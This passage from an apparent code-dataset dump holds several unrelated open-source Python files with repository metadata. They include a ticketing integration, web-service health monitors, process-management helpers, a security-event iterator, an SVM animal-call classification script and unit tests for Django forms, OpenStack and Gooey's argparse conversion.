fields_by_queue = client.queues_list_fields_request(queue_number=str(q))
fields_by_queue = fields_by_queue.get('Fields', [])
for field in fields_by_queue:
if field.get('jsonKey') not in fields:
# get internal error 500 from server with related tickets
if field.get('jsonKey') != 'related_tickets' and field.get('jsonKey') != 'referring_tickets':
fields.append(field.get('jsonKey'))
return fields
def get_queue_ids(client: Client) -> list:
"""
Creating a list of all queue ids that are in the system.
Args:
client: Client for the api.
Returns:
list of queue ids.
"""
queues = client.queues_list_request()
queues = queues.get('Queues', [])
queues_id = []
for q in queues:
queues_id.append(str(q.get('id')))
return queues_id
def shaping_by_fields(fields: list) -> str:
"""
    Creating a shaping string for the request from the given fields, separated by commas.
Args:
fields: List of fields that would be part of the shaping.
Returns:
str of the shaping.
"""
shaping = 'hd_ticket all'
for field in fields:
shaping += f',{field} limited'
return shaping
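# For example (illustrative), shaping_by_fields(['title', 'summary']) returns
# 'hd_ticket all,title limited,summary limited', which is the value passed as the
# shaping query parameter by tickets_list_request.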
def set_shaping(client, queue: Optional[list] = None) -> str:
"""
Creating a shaping for the request.
Args:
client: Client in order to get the queue fields.
queue: If specific queue is given for the shaping.
Returns:
str of the shaping.
"""
fields = get_fields_by_queue(client, queue)
shaping = shaping_by_fields(fields)
return shaping
def parse_incidents(items: list, fetch_limit: str, time_format: str, parsed_last_time: datetime) \
-> Tuple[list, Any]:
"""
This function will create a list of incidents
Args:
items : List of tickets of the api response.
fetch_limit: Limit for incidents of fetch cycle.
time_format: Time format of the integration.
        parsed_last_time: the last fetch time, used as the initial value for the latest incident time.
Returns:
incidents: List of incidents.
parsed_last_time: Time of last incident.
"""
count = 0
incidents = []
for item in items:
if count >= int(fetch_limit):
break
incident_created_time = dateparser.parse(item['created'])
incident = {
'name': item['title'],
'occurred': incident_created_time.strftime(time_format),
'rawJSON': json.dumps(item)
}
incidents.append(incident)
count += 1
parsed_last_time = incident_created_time
return incidents, parsed_last_time
def split_fields(fields: str = '') -> dict:
"""Split str fields of Demisto arguments to request fields by the char ';'.
Args:
fields: fields in a string representation.
Returns:
dic_fields object for request.
"""
dic_fields = {}
if fields:
if '=' not in fields:
raise Exception(
f"The argument: {fields}.\nmust contain a '=' to specify the keys and values. e.g: key=val.")
arr_fields = fields.split(';')
for f in arr_fields:
field = f.split('=', 1) # a field might include a '=' sign in the value. thus, splitting only once.
if len(field) > 1:
dic_fields[field[0]] = field[1]
return dic_fields
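# For example (illustrative), split_fields('owner=admin;note=a=b') returns
# {'owner': 'admin', 'note': 'a=b'}: pairs are separated by ';' and each pair is
# split on the first '=' only, so values may themselves contain '='.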
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
params = demisto.params()
username = params.get('credentials').get("identifier")
password = params.get('credentials').get('password')
base_url = params.get('url')
proxy = demisto.params().get('proxy', False)
verify_certificate = not params.get('insecure', False)
# fetch incidents params
fetch_limit = params.get('fetch_limit', 10)
fetch_time = params.get('fetch_time', '1 day')
fetch_shaping = params.get('fetch_shaping')
fetch_filter = params.get('fetch_filter')
fetch_queue_id = argToList(params.get('fetch_queue_id'))
try:
client = Client(
url=base_url,
username=username,
password=password,
verify=verify_certificate,
proxy=proxy)
command = demisto.command()
LOG(f'Command being called is {command}')
# Commands dict
commands: Dict[str, Callable[[Client, Dict[str, str]], Tuple[str, dict, dict]]] = {
'test-module': test_module,
'kace-machines-list': get_machines_list_command,
'kace-assets-list': get_assets_list_command,
'kace-queues-list': get_queues_list_command,
'kace-tickets-list': get_tickets_list_command,
'kace-ticket-create': create_ticket_command,
'kace-ticket-update': update_ticket_command,
'kace-ticket-delete': delete_ticket_command,
}
if command in commands:
return_outputs(*commands[command](client, demisto.args()))
elif command == 'fetch-incidents':
incidents = fetch_incidents(client, fetch_time=fetch_time, fetch_shaping=fetch_shaping,
fetch_filter=fetch_filter, fetch_limit=fetch_limit,
fetch_queue_id=fetch_queue_id, last_run=demisto.getLastRun())
demisto.incidents(incidents)
else:
raise NotImplementedError(f'{command} is not an existing QuestKace command')
except Exception as e:
return_error(f'Error from QuestKace Integration.\n'
f'Failed to execute {demisto.command()} command.\n\n Error: {str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
VirusTotal/content
|
Packs/QuestKace/Integrations/QuestKace/QuestKace.py
|
Python
|
mit
| 36,041
|
import os
import socket
import StringIO
import tempfile
import time
import traceback
from django.conf import settings
import commonware.log
import requests
from PIL import Image
import amo.search
from amo.utils import memoize
from applications.management.commands import dump_apps
from lib.crypto import packaged, receipt
from lib.crypto.packaged import SigningError as PackageSigningError
from lib.crypto.receipt import SigningError
from lib.pay_server import client
monitor_log = commonware.log.getLogger('z.monitor')
def memcache():
memcache = getattr(settings, 'CACHES', {}).get('default')
memcache_results = []
status = ''
if memcache and 'memcache' in memcache['BACKEND']:
hosts = memcache['LOCATION']
if not isinstance(hosts, (tuple, list)):
hosts = [hosts]
for host in hosts:
ip, port = host.split(':')
try:
s = socket.socket()
s.connect((ip, int(port)))
except Exception, e:
result = False
status = 'Failed to connect to memcached (%s): %s' % (host, e)
monitor_log.critical(status)
else:
result = True
finally:
s.close()
memcache_results.append((ip, port, result))
if len(memcache_results) < 2:
            status = ('2+ memcache servers are required. '
                      '%s available') % len(memcache_results)
monitor_log.warning(status)
if not memcache_results:
status = 'Memcache is not configured'
monitor_log.info(status)
return status, memcache_results
def libraries():
# Check Libraries and versions
libraries_results = []
status = ''
try:
Image.new('RGB', (16, 16)).save(StringIO.StringIO(), 'JPEG')
libraries_results.append(('PIL+JPEG', True, 'Got it!'))
except Exception, e:
msg = "Failed to create a jpeg image: %s" % e
libraries_results.append(('PIL+JPEG', False, msg))
try:
import M2Crypto # NOQA
libraries_results.append(('M2Crypto', True, 'Got it!'))
except ImportError:
libraries_results.append(('M2Crypto', False, 'Failed to import'))
if settings.SPIDERMONKEY:
if os.access(settings.SPIDERMONKEY, os.R_OK):
libraries_results.append(('Spidermonkey is ready!', True, None))
# TODO: see if it works?
else:
msg = "You said spidermonkey was at (%s)" % settings.SPIDERMONKEY
libraries_results.append(('Spidermonkey', False, msg))
else:
msg = "Please set SPIDERMONKEY in your settings file."
libraries_results.append(('Spidermonkey', False, msg))
missing_libs = [l for l, s, m in libraries_results if not s]
if missing_libs:
status = 'missing libs: %s' % ",".join(missing_libs)
return status, libraries_results
def elastic():
elastic_results = None
status = ''
try:
health = amo.search.get_es().cluster_health()
if health['status'] == 'red':
status = 'ES is red'
elastic_results = health
except Exception:
elastic_results = traceback.format_exc()
return status, elastic_results
def path():
# Check file paths / permissions
rw = (settings.TMP_PATH,
settings.NETAPP_STORAGE,
settings.UPLOADS_PATH,
settings.ADDONS_PATH,
settings.MIRROR_STAGE_PATH,
settings.GUARDED_ADDONS_PATH,
settings.ADDON_ICONS_PATH,
settings.COLLECTIONS_ICON_PATH,
settings.PACKAGER_PATH,
settings.PREVIEWS_PATH,
settings.USERPICS_PATH,
settings.REVIEWER_ATTACHMENTS_PATH,
dump_apps.Command.JSON_PATH,)
r = [os.path.join(settings.ROOT, 'locale'),
# The deploy process will want write access to this.
# We do not want Django to have write access though.
settings.PROD_DETAILS_DIR]
filepaths = [(path, os.R_OK | os.W_OK, "We want read + write")
for path in rw]
filepaths += [(path, os.R_OK, "We want read") for path in r]
filepath_results = []
filepath_status = True
for path, perms, notes in filepaths:
path_exists = os.path.exists(path)
path_perms = os.access(path, perms)
filepath_status = filepath_status and path_exists and path_perms
filepath_results.append((path, path_exists, path_perms, notes))
key_exists = os.path.exists(settings.WEBAPPS_RECEIPT_KEY)
key_perms = os.access(settings.WEBAPPS_RECEIPT_KEY, os.R_OK)
filepath_status = filepath_status and key_exists and key_perms
filepath_results.append(('settings.WEBAPPS_RECEIPT_KEY',
key_exists, key_perms, 'We want read'))
status = filepath_status
status = ''
if not filepath_status:
status = 'check main status page for broken perms'
return status, filepath_results
def redis():
# Check Redis
redis_results = [None, 'REDIS_BACKENDS is not set']
status = 'REDIS_BACKENDS is not set'
if getattr(settings, 'REDIS_BACKENDS', False):
import redisutils
status = []
redis_results = {}
for alias, redis in redisutils.connections.iteritems():
try:
redis_results[alias] = redis.info()
except Exception, e:
redis_results[alias] = None
status.append('Failed to chat with redis:%s' % alias)
monitor_log.critical('Failed to chat with redis: (%s)' % e)
status = ','.join(status)
return status, redis_results
# The signer check actually asks the signing server to sign something. Do this
# once per nagios check, once per web head might be a bit much. The memoize
# slows it down a bit, by caching the result for 15 seconds.
@memoize('monitors-signer', time=15)
def receipt_signer():
destination = getattr(settings, 'SIGNING_SERVER', None)
if not destination:
return '', 'Signer is not configured.'
# Just send some test data into the signer.
now = int(time.time())
not_valid = (settings.SITE_URL + '/not-valid')
data = {'detail': not_valid, 'exp': now + 3600, 'iat': now,
'iss': settings.SITE_URL,
'product': {'storedata': 'id=1', 'url': u'http://not-valid.com'},
'nbf': now, 'typ': 'purchase-receipt',
'reissue': not_valid,
'user': {'type': 'directed-identifier',
'value': u'something-not-valid'},
'verify': not_valid
}
try:
result = receipt.sign(data)
except SigningError as err:
msg = 'Error on signing (%s): %s' % (destination, err)
return msg, msg
try:
cert, rest = receipt.crack(result)
except Exception as err:
msg = 'Error on cracking receipt (%s): %s' % (destination, err)
return msg, msg
# Check that the certs used to sign the receipts are not about to expire.
limit = now + (60 * 60 * 24) # One day.
if cert['exp'] < limit:
msg = 'Cert will expire soon (%s)' % destination
return msg, msg
cert_err_msg = 'Error on checking public cert (%s): %s'
location = cert['iss']
try:
resp = requests.get(location, timeout=5, stream=False)
except Exception as err:
msg = cert_err_msg % (location, err)
return msg, msg
if not resp.ok:
msg = cert_err_msg % (location, resp.reason)
return msg, msg
cert_json = resp.json()
    if not cert_json or 'jwk' not in cert_json:
msg = cert_err_msg % (location, 'Not valid JSON/JWK')
return msg, msg
return '', 'Signer working and up to date'
# Like the receipt signer above this asks the packaged app signing
# service to sign one for us.
@memoize('monitors-package-signer', time=60)
def package_signer():
destination = getattr(settings, 'SIGNED_APPS_SERVER', None)
if not destination:
return '', 'Signer is not configured.'
app_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'nagios_check_packaged_app.zip')
signed_path = tempfile.mktemp()
try:
packaged.sign_app(app_path, signed_path, None, False)
return '', 'Package signer working'
except PackageSigningError, e:
msg = 'Error on package signing (%s): %s' % (destination, e)
return msg, msg
finally:
os.unlink(signed_path)
# Not called settings to avoid conflict with django.conf.settings.
def settings_check():
if not settings.MARKETPLACE:
return '', 'No required settings checked on amo'
required = ['APP_PURCHASE_KEY', 'APP_PURCHASE_TYP', 'APP_PURCHASE_AUD',
'APP_PURCHASE_SECRET']
for key in required:
if not getattr(settings, key):
msg = 'Missing required value %s' % key
return msg, msg
return '', 'Required settings ok'
def solitude():
if not settings.MARKETPLACE:
return '', 'Solitude access not required on amo'
try:
res = client.api.services.request.get()
except Exception as err:
return repr(err), repr(err)
auth = res.get('authenticated', None)
if auth != 'marketplace':
msg = 'Solitude authenticated as: %s' % auth
return msg, msg
return '', 'Solitude authentication ok'
|
Joergen/zamboni
|
apps/amo/monitors.py
|
Python
|
bsd-3-clause
| 9,414
|
"""This module provides helper functions for subprocess management."""
import logging
import signal
import subprocess
import sys
import os
import psutil
import cook
import cook.io_helper as cio
def launch_process(command, environment):
"""Launches the process using the command and specified environment.
Parameters
----------
command: string
The command to execute.
environment: dictionary
The environment.
Returns
-------
The launched process.
"""
if not command:
logging.warning('No command provided!')
return None
# The preexec_fn is run after the fork() but before exec() to run the shell.
# setsid will run the program in a new session, thus assigning a new process group to it and its children.
return subprocess.Popen(command,
bufsize=0,
env=environment,
preexec_fn=os.setsid,
shell=True,
stderr=sys.stderr,
stdout=sys.stdout)
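# Illustrative usage of the helpers in this module (hypothetical command and grace period):
#   proc = launch_process('sleep 30', dict(os.environ))
#   if proc is not None and is_process_running(proc):
#       kill_process(proc, shutdown_grace_period_ms=5000)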
def is_process_running(process):
"""Checks whether the process is still running.
Parameters
----------
process: subprocess.Popen
The process to query
Returns
-------
whether the process is still running.
"""
return process.poll() is None
def find_process_group(process_id):
"""Return the process group id of the process with process id process_id.
Parameters
----------
process_id: int
The process id.
Returns
-------
The process group id of the process with process id process_id or None.
"""
try:
group_id = os.getpgid(process_id)
logging.info('Process (pid: {}) belongs to group (id: {})'.format(process_id, group_id))
return group_id
except ProcessLookupError:
logging.info('Unable to find group for process (pid: {})'.format(process_id))
except Exception:
logging.exception('Error in finding group for process (pid: {})'.format(process_id))
def _send_signal_to_process(process_id, signal_to_send):
"""Send the signal_to_send signal to the process with process_id.
Parameters
----------
process_id: int
        The id of the process to signal.
signal_to_send: signal.Signals enum
The signal to send to the process group.
Returns
-------
True if the signal was sent successfully.
"""
signal_name = signal_to_send.name
try:
logging.info('Sending {} to process (id: {})'.format(signal_name, process_id))
os.kill(process_id, signal_to_send)
return True
except ProcessLookupError:
logging.info('Unable to send {} as could not find process (id: {})'.format(signal_name, process_id))
except Exception:
logging.exception('Error in sending {} to process (id: {})'.format(signal_name, process_id))
return False
def _send_signal_to_process_tree(root_process_id, signal_to_send):
"""Send the signal_to_send signal to the process tree rooted at process_id.
Parameters
----------
process_id: int
The id of the root process.
signal_to_send: signal.Signals enum
The signal to send to the process group.
Returns
-------
True if the signal was sent successfully.
"""
signal_name = signal_to_send.name
logging.info('Sending {} to process tree rooted at (id: {})'.format(signal_name, root_process_id))
process_queue = [root_process_id]
visited_process_ids = set()
num_processes_found = 0
num_processes_killed = 0
signal_sent_to_all_processes_successfully = True
while process_queue:
loop_process_id = process_queue.pop(0)
num_processes_found += 1
try:
visited_process_ids.add(loop_process_id)
# Stop the process to keep it from forking since a forked child might get re-parented
_send_signal_to_process(loop_process_id, signal.SIGSTOP)
# Now safe to retrieve the children
process = psutil.Process(loop_process_id)
children = process.children()
[process_queue.append(child.pid) for child in children if child.pid not in visited_process_ids]
if _send_signal_to_process(loop_process_id, signal_to_send):
num_processes_killed += 1
else:
signal_sent_to_all_processes_successfully = False
except psutil.NoSuchProcess:
logging.info('Unable to send {} as could not find process (id: {})'.format(signal_name, loop_process_id))
except Exception:
logging.exception('Error in sending {} to process (id: {})'.format(signal_name, loop_process_id))
signal_sent_to_all_processes_successfully = False
log_message = 'Found {} process(es) in tree rooted at (id: {}), successfully sent {} to {} process(es)'
logging.info(log_message.format(num_processes_found, root_process_id, signal_name, num_processes_killed))
for loop_process_id in visited_process_ids:
# Try and continue the processes in case the signal is non-terminating but doesn't continue the process.
_send_signal_to_process(loop_process_id, signal.SIGCONT)
return signal_sent_to_all_processes_successfully
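# The SIGSTOP / SIGCONT pairing above is what makes the tree walk safe: each process
# is frozen before its children are enumerated, so it cannot fork new children that
# the walk would miss, and every visited process is resumed afterwards in case the
# delivered signal was non-terminating.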
def _send_signal_to_process_group(process_id, signal_to_send):
"""Send the signal_to_send signal to the process group with group_id.
Parameters
----------
process_id: int
The id of the process whose group to kill.
signal_to_send: signal.Signals enum
The signal to send to the process group.
Returns
-------
True if the signal was sent successfully.
"""
signal_name = signal_to_send.name
try:
group_id = find_process_group(process_id)
if group_id:
logging.info('Sending {} to group (id: {})'.format(signal_name, group_id))
os.killpg(group_id, signal_to_send)
return True
except ProcessLookupError:
logging.info('Unable to send {} as could not find group (id: {})'.format(signal_name, group_id))
except Exception:
logging.exception('Error in sending {} to group (id: {})'.format(signal_name, group_id))
return False
def send_signal(process_id, signal_to_send):
"""Send the signal_to_send signal to the process with process_id.
The function uses a three-step mechanism:
1. It sends the signal to the process tree rooted at process_id;
2. If unsuccessful, it sends the signal to the process group of process_id;
3. If unsuccessful, it sends the signal directly to the process with id process_id."""
if process_id:
signal_name = signal_to_send.name
logging.info('Requested to send {} to process (id: {})'.format(signal_name, process_id))
if _send_signal_to_process_tree(process_id, signal_to_send):
logging.info('Successfully sent {} to process tree (id: {})'.format(signal_name, process_id))
elif _send_signal_to_process_group(process_id, signal_to_send):
logging.info('Successfully sent {} to group for process (id: {})'.format(signal_name, process_id))
elif _send_signal_to_process(process_id, signal_to_send):
logging.info('Successfully sent {} to process (id: {})'.format(signal_name, process_id))
else:
logging.info('Failed to send {} to process (id: {})'.format(signal_name, process_id))
def kill_process(process, shutdown_grace_period_ms):
"""Attempts to kill a process.
First attempt is made by sending the process a SIGTERM.
If the process does not terminate inside (shutdown_grace_period_ms - 100) ms, it is then sent a SIGKILL.
The 100 ms grace period is allocated for the executor to perform its other cleanup actions.
Parameters
----------
process: subprocess.Popen
The process to kill
shutdown_grace_period_ms: int
Grace period before forceful kill
Returns
-------
True if the process completed execution or was killed.
"""
shutdown_grace_period_ms = max(shutdown_grace_period_ms - (1000 * cook.TERMINATE_GRACE_SECS), 0)
if is_process_running(process):
logging.info('Waiting up to {} ms for process to terminate'.format(shutdown_grace_period_ms))
send_signal(process.pid, signal.SIGTERM)
shutdown_grace_period_secs = shutdown_grace_period_ms / 1000.0
try:
process.wait(shutdown_grace_period_secs)
cio.print_and_log('Command terminated with signal Terminated (pid: {})'.format(process.pid))
except subprocess.TimeoutExpired:
logging.info('Process did not terminate via SIGTERM after {} seconds'.format(shutdown_grace_period_secs))
except Exception:
logging.exception('Error while sending SIGTERM to (pid: {})'.format(process.pid))
if is_process_running(process):
send_signal(process.pid, signal.SIGKILL)
try:
process.wait() # wait indefinitely for process to die/complete, it cannot ignore SIGKILL
cio.print_and_log('Command terminated with signal Killed (pid: {})'.format(process.pid))
except Exception:
logging.exception('Error while sending SIGKILL to (pid: {})'.format(process.pid))
return not is_process_running(process)
|
twosigma/Cook
|
executor/cook/subprocess.py
|
Python
|
apache-2.0
| 9,401
|
"""This class provides an iterator. Under the covers it does multi-threaded
consumption of events, only providing information to the iterator when it's
been ordered correctly."""
import cloudpassage
from halocelery.apputils import Utility as hc_util
class HaloEvents(object):
"""Instantiate with a donlib.ConfigHelper() object as an argument."""
def __init__(self, config):
self.halo_key = config.halo_api_key
self.halo_secret = config.halo_api_secret_key
self.halo_api_host = config.halo_api_host
self.halo_api_port = config.halo_api_port
self.ua = config.ua
self.start_timestamp = self.starting_event_time()
hc_util.log_stdout("Event Collector: Starting timestamp: " + self.start_timestamp) # NOQA
def __iter__(self):
"""This allows us to iterate through the events stream."""
session = self.build_halo_session()
streamer = cloudpassage.TimeSeries(session, self.start_timestamp,
"/v1/events", "events")
while True:
try:
for event in streamer:
yield event
except IndexError:
pass
def starting_event_time(self):
session = self.build_halo_session()
api = cloudpassage.HttpHelper(session)
url = "/v1/events?sort_by=created_at.desc&per_page=1"
resp = api.get(url)
return resp['events'][0]['created_at']
def build_halo_session(self):
"""This creates the halo session object for API interaction."""
session = cloudpassage.HaloSession(self.halo_key, self.halo_secret,
api_host=self.halo_api_host,
api_port=self.halo_api_port,
integration_string=self.ua)
return session
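# --- Editor's addition: hedged usage sketch, not part of the original file. ---
# Shows how the iterator is typically consumed. The class docstring says to
# pass a donlib.ConfigHelper(); the import path and the shape of each yielded
# event dict are assumptions here.
if __name__ == '__main__':
    from donlib import ConfigHelper  # assumed import path, per the class docstring
    halo_events = HaloEvents(ConfigHelper())
    for event in halo_events:  # streams indefinitely, yielding ordered events
        hc_util.log_stdout("Event received: %s" % event.get("id", "unknown"))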
|
ashmastaflash/don-bot
|
app/donlib/halo_events.py
|
Python
|
bsd-3-clause
| 1,891
|
from django.test import TestCase
from app_forum.models import Forum, Comment
from app_forum.forms import CommentForm, ThreadForm
# test for forms
class CommentFormTest(TestCase):
def test_comment_forms(self):
form_data = {
'comment_content' : 'comment'
}
form = CommentForm(data=form_data)
self.assertTrue(form.is_valid())
class ThreadFormTest(TestCase):
def test_thread_forms(self):
thread_data = {
'forum_title' : 'title',
'forum_category' : 'category',
'forum_content' : 'content'
}
thread = ThreadForm(data=thread_data)
self.assertFalse(thread.is_valid())
|
django-id/website
|
app_forum/tests/test_forms.py
|
Python
|
mit
| 685
|
import os
from PIL import Image
from vistas.core.graphics.overlay import BasicOverlayButton
from vistas.core.paths import get_resources_directory
class ExpandButton(BasicOverlayButton):
""" Expand/collapse button for the right panel """
def __init__(self):
self._expanded = False
self.image = Image.open(os.path.join(get_resources_directory(), 'images', 'expand_button.png'))
super().__init__(self.image.transpose(Image.FLIP_LEFT_RIGHT), (0, 20))
@property
def expanded(self):
return self._expanded
@expanded.setter
def expanded(self, expanded):
self._expanded = expanded
self.default_image = self.image if not expanded else self.image.transpose(Image.FLIP_LEFT_RIGHT)
|
VISTAS-IVES/pyvistas
|
source/vistas/ui/controls/expand_button.py
|
Python
|
bsd-3-clause
| 748
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ------------------------------------
# file: manlabeled_nsamples.py
# date: Tue August 05 03:05 2014
# author:
# Maarten Versteegh
# github.com/mwv
# maartenversteegh AT gmail DOT com
#
# Licensed under GPLv3
# ------------------------------------
"""nsamples_performance_supervised: investigate the number of manually labeled examples
needed for performance. replication of mielke_replication but with variable
number of training samples
"""
from __future__ import division
import os
import warnings
warnings.filterwarnings('ignore')
import numpy as np
from sklearn.cross_validation import train_test_split, StratifiedKFold
from sklearn.svm import SVC
from sklearn.grid_search import GridSearchCV
import sklearn.metrics as metrics
MONKEYS = ['Titi_monkeys', 'Blue_monkeys', 'colobus', 'Blue_monkeys_Fuller']
import mielke_replication as mr
def stratified_sample(X, y, n):
"""Sample n elements from X, y, preserving class balance
Arguments:
    :param X: feature array, indexed along its first axis
    :param y: label array aligned with X
    :param n: number of samples to draw
"""
res = X.shape[0] - n
classes, y_indices = np.unique(y, return_inverse=True)
cls_count = np.bincount(y_indices)
p_i = cls_count / len(y)
n_i = np.maximum(np.round(n * p_i).astype(int),
4) # minimum of four samples per class
t_i = np.minimum(cls_count - n_i, np.round(res * p_i).astype(int))
inds = []
for i, cls in enumerate(classes):
permutation = np.random.permutation(n_i[i]+t_i[i])
cls_i = np.where((y == cls))[0][permutation]
inds.extend(cls_i[:n_i[i]])
inds = np.random.permutation(inds)
return X[inds], y[inds]
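# --- Editor's addition: hedged illustration, not part of the original file. ---
# Small self-contained check of stratified_sample: draw 40 rows from an
# imbalanced two-class set (80/20) and confirm the class proportions survive,
# giving roughly 32 and 8 samples per class.
def _example_stratified_sample():
    X_demo = np.arange(200).reshape(100, 2)
    y_demo = np.array([0] * 80 + [1] * 20)
    X_sub, y_sub = stratified_sample(X_demo, y_demo, 40)
    print('sampled class counts: %s' % np.bincount(y_sub))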
def classification_by_monkey(X, y, labelset, param_grid,
n_steps=20, n_folds_test=20, n_folds_gridsearch=5,
verbose=True):
for monkey in X.keys():
if verbose:
print monkey
scores = np.zeros((n_steps, 6))
min_nsamples = len(labelset[monkey]) * 2
for step in range(n_steps):
y_true = None
y_pred = None
avg_nsamples = 0
for fold in range(n_folds_test):
if verbose:
print '\r step: {0:3d}/{1:3d}, fold: {2:3d}'\
.format(step+1, n_steps, fold+1),
X_train, X_test, y_train, y_test = \
train_test_split(X[monkey], y[monkey], test_size=0.1)
steps = np.linspace(min_nsamples,
X_train.shape[0],
n_steps).astype(int)
n_train = steps[step]
X_train, y_train = stratified_sample(X_train, y_train, n_train)
avg_nsamples += X_train.shape[0]
clf = GridSearchCV(SVC(),
param_grid,
cv=StratifiedKFold(y_train,
n_folds=n_folds_gridsearch),
score_func=metrics.accuracy_score,
                                   verbose=0, n_jobs=-1)
clf.fit(X_train, y_train)
if y_true is None:
y_true = y_test
y_pred = clf.predict(X_test)
else:
y_true = np.hstack((y_true, y_test))
y_pred = np.hstack((y_pred, clf.predict(X_test)))
            avg_nsamples /= n_folds_test
scores[step] = np.hstack(([avg_nsamples, y_true.shape[0]],
metrics.precision_recall_fscore_support(y_true, y_pred,
average='weighted')[:-1],
[metrics.accuracy_score(y_true, y_pred)]))
np.savetxt('results/clf_by_nsamples_{0}_blue_merged.txt'.format(monkey),
scores, fmt=['%.0f','%.0f', '%.3f','%.3f','%.3f', '%.3f'],
delimiter='\t',
header='nsamples\tsupport\tprecision\trecall\tfscore\taccuracy')
if verbose:
print
def classification_across_monkey(X, y, labelset, param_grid,
n_steps=20, n_folds_test=20,
n_folds_gridsearch=5,
verbose=True):
X, y, labelset = mr.combine_labels(X, y, labelset)
if verbose:
print 'classification across monkey'
min_nsamples = len(labelset) * 2
scores = np.zeros((n_steps, 6))
for step in range(n_steps):
y_true = None
y_pred = None
avg_nsamples = 0
for fold in range(n_folds_test):
if verbose:
print '\r step: {0:3d}/{1:3d}, fold: {2:3d}'\
.format(step+1, n_steps, fold+1),
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)
steps = np.linspace(min_nsamples,
X_train.shape[0],
n_steps).astype(int)
n_train = steps[step]
X_train, y_train = stratified_sample(X_train, y_train, n_train)
avg_nsamples += X_train.shape[0]
clf = GridSearchCV(SVC(),
param_grid,
cv=StratifiedKFold(y_train,
n_folds=n_folds_gridsearch),
score_func=metrics.accuracy_score,
verbose=0, n_jobs=-1)
clf.fit(X_train, y_train)
if y_true is None:
y_true = y_test
y_pred = clf.predict(X_test)
else:
y_true = np.hstack((y_true, y_test))
y_pred = np.hstack((y_pred, clf.predict(X_test)))
        avg_nsamples /= n_folds_test
scores[step] = np.hstack(([avg_nsamples, y_true.shape[0]],
metrics.precision_recall_fscore_support(y_true, y_pred,
average='weighted')[:-1],
[metrics.accuracy_score(y_true, y_pred)]))
np.savetxt('results/clf_across_nsamples_blue_merged.txt',
scores, fmt=['%.0f','%.0f', '%.3f','%.3f','%.3f', '%.3f'],
delimiter='\t',
header='nsamples\tsupport\tprecision\trecall\tfscore\taccuracy')
if verbose:
print
if __name__ == '__main__':
X, y, labelset = mr.load_all_monkeys()
from svc_param_grid import param_grid
n_steps = 25
n_folds = 10
try:
os.makedirs('results')
except OSError:
pass
classification_by_monkey(X, y, labelset, param_grid,
n_steps=n_steps,
n_folds_test=n_folds)
classification_across_monkey(X, y, labelset, param_grid,
n_steps=n_steps,
n_folds_test=n_folds)
|
bootphon/monkey_business
|
nsamples_performance_supervised.py
|
Python
|
gpl-2.0
| 7,035
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from openstack.key_management import key_management_service
class TestKeyManagementService(testtools.TestCase):
def test_service(self):
sot = key_management_service.KeyManagementService()
self.assertEqual('key-manager', sot.service_type)
self.assertEqual('public', sot.interface)
self.assertIsNone(sot.region)
self.assertIsNone(sot.service_name)
self.assertEqual(1, len(sot.valid_versions))
self.assertEqual('v1', sot.valid_versions[0].module)
self.assertEqual('v1', sot.valid_versions[0].path)
|
sjsucohort6/openstack
|
python/venv/lib/python2.7/site-packages/openstack/tests/unit/key_management/test_key_management_service.py
|
Python
|
mit
| 1,130
|
import argparse
import sys
import unittest
from argparse import ArgumentParser, FileType
from gooey import GooeyParser
from gooey.python_bindings import argparse_to_json
from gooey.util.functional import getin
from gooey.tests import *
from gui.components.options.options import FileChooser
from gui.components.widgets import FileSaver
class TestArgparse(unittest.TestCase):
def test_mutex_groups_conversion(self):
"""
Ensure multiple mutex groups are processed correctly.
"""
parser = ArgumentParser()
g1 = parser.add_mutually_exclusive_group(required=True)
g1.add_argument('--choose1')
g1.add_argument('--choose2')
g2 = parser.add_mutually_exclusive_group(required=True)
g2.add_argument('--choose3')
g2.add_argument('--choose4')
output = argparse_to_json.process(parser, {}, {}, {})
# assert that we get two groups of two choices back
items = output[0]['items']
self.assertTrue(len(items) == 2)
group1 = items[0]
group2 = items[1]
self.assertTrue(['--choose1'] in group1['data']['commands'])
self.assertTrue(['--choose2'] in group1['data']['commands'])
self.assertTrue(['--choose3'] in group2['data']['commands'])
self.assertTrue(['--choose4'] in group2['data']['commands'])
self.assertTrue(group1['type'] == 'RadioGroup')
self.assertTrue(group2['type'] == 'RadioGroup')
def test_json_iterable_conversion(self):
"""
Issue #312 - tuples weren't being coerced to list during argparse
conversion causing downstream issues when concatenating
"""
# our original functionality accepted only lists as the choices arg
parser = ArgumentParser()
parser.add_argument("-foo", choices=['foo','bar', 'baz'])
result = argparse_to_json.action_to_json(parser._actions[-1], "Dropdown", {})
choices = result['data']['choices']
self.assertTrue(isinstance(choices, list))
self.assertEqual(choices, ['foo','bar', 'baz'])
# Now we allow tuples as well.
parser = ArgumentParser()
parser.add_argument("-foo", choices=('foo','bar', 'baz'))
result = argparse_to_json.action_to_json(parser._actions[-1], "Dropdown", {})
choices = result['data']['choices']
self.assertTrue(isinstance(choices, list))
self.assertEqual(choices, ['foo','bar', 'baz'])
def test_choice_string_cooersion(self):
"""
Issue 321 - must coerce choice types to string to support wx.ComboBox
"""
parser = ArgumentParser()
parser.add_argument('--foo', default=1, choices=[1, 2, 3])
choice_action = parser._actions[-1]
result = argparse_to_json.action_to_json(choice_action, 'Dropdown', {})
self.assertEqual(getin(result, ['data', 'choices']), ['1', '2', '3'])
# default value is also converted to a string type
self.assertEqual(getin(result, ['data', 'default']), '1')
def test_choice_string_cooersion_no_default(self):
"""
Make sure that choice types without a default don't create
the literal string "None" but stick with the value None
"""
parser = ArgumentParser()
parser.add_argument('--foo', choices=[1, 2, 3])
choice_action = parser._actions[-1]
result = argparse_to_json.action_to_json(choice_action, 'Dropdown', {})
self.assertEqual(getin(result, ['data', 'default']), None)
def test_listbox_defaults_cast_correctly(self):
"""
Issue XXX - defaults supplied in a list were turned into a string
wholesale (list and all). The defaults should be stored as a list
proper with only the _internal_ values coerced to strings.
"""
parser = GooeyParser()
parser.add_argument('--foo', widget="Listbox", nargs="*", choices=[1, 2, 3], default=[1, 2])
choice_action = parser._actions[-1]
